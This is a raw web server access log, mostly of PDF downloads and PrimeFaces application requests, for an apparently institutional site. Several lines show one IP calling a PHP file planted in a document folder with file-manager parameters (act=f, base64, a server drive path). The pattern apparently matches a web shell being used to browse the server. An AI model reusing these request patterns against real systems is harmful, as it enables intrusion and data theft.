3.224.220.101 - - [25/Apr/2024:06:12:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2802.pdf HTTP/1.1" 200 331474
201.245.192.253 - - [25/Apr/2024:06:12:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41163
23.22.35.162 - - [25/Apr/2024:06:12:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2268.pdf HTTP/1.1" 200 663967
52.70.240.171 - - [25/Apr/2024:06:12:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2800.pdf HTTP/1.1" 200 273672
186.84.88.21 - - [25/Apr/2024:06:12:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9243
186.84.88.21 - - [25/Apr/2024:06:12:47 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
23.22.35.162 - - [25/Apr/2024:06:12:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2798.pdf HTTP/1.1" 200 333199
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 61995
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:12:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
47.128.28.65 - - [25/Apr/2024:06:12:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050%5C&f=00001037.tif HTTP/1.1" 200 17697
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
3.224.220.101 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2267.pdf HTTP/1.1" 200 446931
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.28.65 - - [25/Apr/2024:06:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
